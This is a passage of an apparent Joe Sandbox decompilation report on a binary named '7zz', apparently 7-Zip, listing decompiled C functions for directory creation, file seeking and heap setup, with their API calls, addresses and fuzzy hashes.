				intOrPtr* _t131;
				void* _t137;
				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				E0046B890(E00474EAE, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = E004079F2();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00418C9D(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00401E9A(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00401E9A(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00401E9A(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					if(E0040A28C( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c, _t199 + 0x1c) != 0) {
						_t137 = E00407399(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401E26(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = E004072C9(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401E26(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E00418E2D(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_push( *((intOrPtr*)(_t199 + 0x14)));
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00418554(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = E0040B0A0(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							E00406796(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							E00407A18( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(E0040B0A0(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									E00406796(_t193);
									 *(_t199 - 4) = 4;
									E00407A18( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							E00407A18( *(_t199 - 0x30));
							E00407A18( *(_t199 - 0x24));
							E00407A18( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							E0043361B(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							E00407A18( *(_t199 - 0x30));
							E00407A18( *(_t199 - 0x24));
							E00407A18( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						E00407A18( *(_t199 - 0x30));
						E00407A18( *(_t199 - 0x24));
						E00407A18( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

0x00418a28
0x00418a33
0x00418a35
0x00418a37
0x00418a3c
0x00418a3f
0x00418a42
0x00418a45
0x00418a4b
0x00418a50
0x00418a53
0x00418a60
0x00418a60
0x00418a55
0x00418a5c
0x00418a5c
0x00418a62
0x00418a68
0x00418a6b
0x00418a70
0x00418a70
0x00418a78
0x00418a7e
0x00418a85
0x00418a88
0x00418a8b
0x00418a8e
0x00418a98
0x00418a9c
0x00418a9f
0x00418aa2
0x00418aa5
0x00418aaf
0x00418ab3
0x00418ab6
0x00418ab9
0x00418abc
0x00418ac4
0x00418ac8
0x00418b92
0x00418b97
0x00000000
0x00418ad7
0x00418aea
0x00418b31
0x00418b3a
0x00418b3e
0x00418b46
0x00418b4a
0x00418b5a
0x00418b63
0x00418b67
0x00418b6f
0x00418b73
0x00418b7c
0x00418b80
0x00418b83
0x00418b9a
0x00418b9a
0x00418b9f
0x00418ba2
0x00418ba5
0x00418ba8
0x00418bab
0x00418bae
0x00418bb3
0x00418bb5
0x00418bb8
0x00418bf4
0x00418bf8
0x00418bfd
0x00418c00
0x00418c03
0x00418c07
0x00418c0f
0x00418c13
0x00418c18
0x00418c1c
0x00418c1e
0x00418c27
0x00418c2f
0x00418c32
0x00418c36
0x00418c3e
0x00418c42
0x00418c47
0x00418c49
0x00418c49
0x00418c1e
0x00418c4e
0x00418c5a
0x00418c63
0x00418c66
0x00418c6e
0x00418c76
0x00418c7b
0x00418c85
0x00418c8a
0x00418c8a
0x00418bba
0x00418bbd
0x00418bc5
0x00418bcd
0x00418bd2
0x00418bd5
0x00418bdc
0x00418bde
0x00418be3
0x00418be3
0x00418be6
0x00418be6
0x00418aec
0x00418af5
0x00418af7
0x00418aff
0x00418b07
0x00418b0c
0x00418b0f
0x00418b18
0x00418b1d
0x00418b1d
0x00418b20
0x00418b20
0x00418aea
0x00418c92
0x00418c9a

APIs

__EH_prolog.LIBCMT ref: 00418A28
GetLastError.KERNEL32(?,00000003,00000003,00000003,?,00000000,00000000), ref: 00418AEC

Part of subcall function 00418C9D: __EH_prolog.LIBCMT ref: 00418CA2

Part of subcall function 00418E2D: __EH_prolog.LIBCMT ref: 00418E32

Part of subcall function 00418554: __EH_prolog.LIBCMT ref: 00418559

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$ErrorLast
String ID:
API String ID: 2901101390-0
Opcode ID: c9f4e70e773d5ff2db6c1d574806bff589abc09b194824381731b90e3be6153d
Instruction ID: 21ff3a450d6b3ea728cd5a75b88ce90788197c2b0c5ee23b9bcb2e1d4e856eb5
Opcode Fuzzy Hash: c9f4e70e773d5ff2db6c1d574806bff589abc09b194824381731b90e3be6153d
Instruction Fuzzy Hash: 9F814771D04209EBCF01EFA5D881ADEBBB5BF08314F14456EF415B32A1DB39AA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409D7C Relevance: 3.2, APIs: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00409D7C(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				E0046B890(E00473AB8, _t138);
				E00403532(_t138 - 0x18, __ecx);
				_t109 =  *(_t138 - 0x14);
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					E004039C0(_t138 - 0x24, _t138 - 0x18);
					_t135 =  *(_t138 - 0x14);
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E00409CCB( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							E0040351A(_t138 - 0x40);
							 *(_t138 - 4) = 2;
							_t80 = E0040B431(_t138 - 0x68, _t128, __eflags,  *((intOrPtr*)(_t138 - 0x18))); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									E00407A18( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								E00407A18( *((intOrPtr*)(_t138 - 0x40)));
								E00407A18( *((intOrPtr*)(_t138 - 0x24)));
								E00407A18( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t87 =  *(_t138 - 0x14);
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
								E00407A18( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = E00407399(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401E26(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											E00407A18( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401E26(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						__eflags = _t135 -  *(_t138 - 0x14);
						if(_t135 >=  *(_t138 - 0x14)) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t135 =  *(_t138 - 0x14);
							}
							_t74 = E00407399(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E00409CCB( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							E00407A18( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									E004075A5(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										E00407A18(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

0x00409d81
0x00409d90
0x00409d95
0x00409d98
0x00409da0
0x00409da1
0x00409de9
0x00409df0
0x00409df5
0x00409df8
0x00409dfc
0x00409dfc
0x00409dff
0x00409e04
0x00409e06
0x00000000
0x00000000
0x00409e0c
0x00409e12
0x00409e17
0x00409e8c
0x00409e97
0x00409e9b
0x00409ea0
0x00409ea2
0x00409eab
0x00409eae
0x00409eb0
0x00409ed7
0x00409edb
0x00000000
0x00409eb2
0x00409eb2
0x00409eb2
0x00000000
0x00409eb2
0x00409ea4
0x00409ea4
0x00409eb4
0x00409eb7
0x00409ebf
0x00409ec7
0x00409ecc
0x00409e19
0x00409e19
0x00409e1c
0x00409e1e
0x00409f51
0x00409f51
0x00409f51
0x00409f53
0x00409f56
0x00409f5b
0x00000000
0x00409e24
0x00409e24
0x00409e27
0x00409e2b
0x00409e2b
0x00409e2e
0x00000000
0x00000000
0x00409e30
0x00409e32
0x00409e40
0x00409e40
0x00409e34
0x00409e35
0x00000000
0x00409e35
0x00409e43
0x00409e43
0x00409e45
0x00000000
0x00409e51
0x00409e51
0x00409e57
0x00000000
0x00409e5d
0x00409e65
0x00409e6e
0x00409e72
0x00409e77
0x00409e7e
0x00000000
0x00409e83
0x00409e57
0x00000000
0x00409e45
0x00409e3c
0x00000000
0x00409e3c
0x00409e1e
0x00000000
0x00409e17
0x00409ee8
0x00409eed
0x00409eed
0x00409eed
0x00409ef0
0x00000000
0x00000000
0x00409ef6
0x00409ef9
0x00409efd
0x00409efd
0x00409f00
0x00409f03
0x00000000
0x00000000
0x00409f05
0x00409f08
0x00409f16
0x00409f16
0x00409f0a
0x00409f0b
0x00000000
0x00409f0b
0x00409f19
0x00409f19
0x00409f1b
0x00409f1d
0x00409f1d
0x00409f28
0x00409f2f
0x00409f33
0x00409f3a
0x00409f43
0x00409f47
0x00409f4c
0x00409f4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00409f4f
0x00409f12
0x00000000
0x00409f12
0x00409f77
0x00000000
0x00409da3
0x00409da3
0x00409da6
0x00409daa
0x00409db1
0x00409dbd
0x00409dbd
0x00409db3
0x00409db4
0x00000000
0x00409db4
0x00409dc0
0x00409dc0
0x00409dc2
0x00000000
0x00409dc4
0x00409dc7
0x00409dc9
0x00000000
0x00409dcb
0x00409dcb
0x00409dce
0x00409dde
0x00409de4
0x00000000
0x00409dd0
0x00409dd0
0x00409dd5
0x00000000
0x00409dd7
0x00409dd7
0x00409f5f
0x00409f60
0x00409f65
0x00409dd5
0x00409dce
0x00409dc9
0x00000000
0x00409dc2
0x00409db9
0x00000000
0x00409db9
0x00409f66
0x00409f6e
0x00409f76

APIs

__EH_prolog.LIBCMT ref: 00409D81
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00409E0C

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorH_prologLast
String ID:
API String ID: 1057991267-0
Opcode ID: 27410a41fbf9886fd801f2971488f14059beac07e3496cbe200165a808850a0c
Instruction ID: a50931f9f0b53e642fd9c4839daf4fd4c57a1ea79cde473ef903889cc23e4543
Opcode Fuzzy Hash: 27410a41fbf9886fd801f2971488f14059beac07e3496cbe200165a808850a0c
Instruction Fuzzy Hash: DE51DF31D4410ADADF10EBA1C942AEEBB74AF51318F14017BE801B72D2D739AE46C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 004183FD Relevance: 3.1, APIs: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E004183FD(intOrPtr __ecx) {
				long _t31;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t42;
				intOrPtr _t53;
				intOrPtr _t59;
				long _t62;
				void* _t64;
				void* _t65;

				E0046B890(E00474DEA, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x40);
						_t53 = E004079F2();
						 *((intOrPtr*)(_t65 + 0x10)) = _t53;
						 *(_t65 - 4) = 2;
						if(_t53 == 0) {
							_t64 = 0;
						} else {
							_t64 = E0040CF63(_t53);
						}
						 *(_t65 - 4) = 1;
						E0040C9B4(_t65 - 0x14, _t64);
						if(E0040CF41(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t31 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t42 = E004079F2();
					if(_t42 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t42 + 4)) = 0;
						 *_t42 = 0x47ab90;
					}
					E0040C9B4(_t65 - 0x10, _t42);
					L12:
					_t31 = E00417BAE(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t31;
				_t32 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 8))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
			}

0x00418402
0x00418407
0x00418408
0x0041840e
0x00418410
0x00418413
0x00418416
0x0041841c
0x00418420
0x00418449
0x00000000
0x0041844b
0x0041844b
0x00418453
0x00418455
0x0041845a
0x0041845e
0x00418469
0x00418460
0x00418465
0x00418465
0x0041846f
0x00418473
0x00418484
0x00418491
0x00000000
0x00418486
0x00418486
0x00418486
0x00418484
0x00418422
0x00418422
0x00418424
0x0041842c
0x00418439
0x0041842e
0x0041842e
0x00418431
0x00418431
0x0041843f
0x00418494
0x004184a5
0x004184a5
0x004184aa
0x004184ac
0x004184b1
0x004184b4
0x004184b9
0x004184b9
0x004184bc
0x004184bf
0x004184c5
0x004184ca
0x004184ca
0x004184d5
0x004184dd

APIs

__EH_prolog.LIBCMT ref: 00418402
GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00418604,?,00000001,?,?,?,?,?,00000000), ref: 00418486

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorH_prologLast
String ID:
API String ID: 1057991267-0
Opcode ID: 308fd318d4d419b36d2cf5317f0bba856b964c67d85d69ddef6ecca4757266ff
Instruction ID: 4421d415675076c99ccf6d41903839941164c9ea02229811d1821141610bcbe1
Opcode Fuzzy Hash: 308fd318d4d419b36d2cf5317f0bba856b964c67d85d69ddef6ecca4757266ff
Instruction Fuzzy Hash: 1F319F7190011AEFCB14DFA9C9856EEBBA1FF44304F14416FE809A3291DF384E80D76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA47 Relevance: 3.0, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040BA47(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t21;
				long _t22;
				long* _t23;
				void** _t27;

				_t27 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(__ecx[1] != 0 && __ecx[1] != 0 && _a12 == 2) {
					_a4 = __ecx[2] + _a4;
					_a12 = 0;
					asm("adc [ebp+0xc], esi");
				}
				_t21 = _a4;
				_v8 = _a8;
				_v12 = _t21;
				_t22 = SetFilePointer( *_t27, _t21,  &_v8, _a12); // executed
				_v12 = _t22;
				if(_t22 != 0xffffffff || GetLastError() == 0) {
					_t23 = _a16;
					 *_t23 = _v12;
					_t23[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}

0x0040ba47
0x0040ba4a
0x0040ba4b
0x0040ba51
0x0040ba62
0x0040ba68
0x0040ba6b
0x0040ba6e
0x0040ba75
0x0040ba78
0x0040ba7e
0x0040ba85
0x0040ba8e
0x0040ba91
0x0040baa1
0x0040baa7
0x0040baac
0x00000000
0x0040ba9d
0x00000000
0x0040ba9d

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040BA85
GetLastError.KERNEL32(?,?,?,?), ref: 0040BA93

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
Instruction ID: 7184b7cf4ce748ed61815dc5e944d1670cffa5033586876219b28924bd56fada
Opcode Fuzzy Hash: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
Instruction Fuzzy Hash: A4014474600248EFCB00CF64D44089E7BB5EF45314B24C5AAE814A7391D376DE45DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0046EA66 Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046EA66(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x496580 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E0046E91E(_t12, _t15);
					 *0x496584 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0046F60A();
							goto L5;
						}
					} else {
						_t10 = E0046EAC3(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x496580);
							goto L7;
						}
					}
				}
			}

0x0046ea66
0x0046ea77
0x0046ea7d
0x0046ea7f
0x0046ea84
0x0046eabc
0x0046eabe
0x0046ea86
0x0046ea86
0x0046ea8e
0x0046ea93
0x0046eaa2
0x0046eaa5
0x00000000
0x0046eaa7
0x0046eaa7
0x00000000
0x0046eaa7
0x0046ea95
0x0046ea9a
0x0046eaac
0x0046eaae
0x0046eabf
0x0046eac1
0x0046eac2
0x0046eab0
0x0046eab6
0x00000000
0x0046eab6
0x0046eaae
0x0046ea93

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77

Part of subcall function 0046E91E: GetVersionExA.KERNEL32 ref: 0046E93D

HeapDestroy.KERNEL32 ref: 0046EAB6

Part of subcall function 0046EAC3: HeapAlloc.KERNEL32(00000000,00000140,0046EA9F,000003F8), ref: 0046EAD0

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

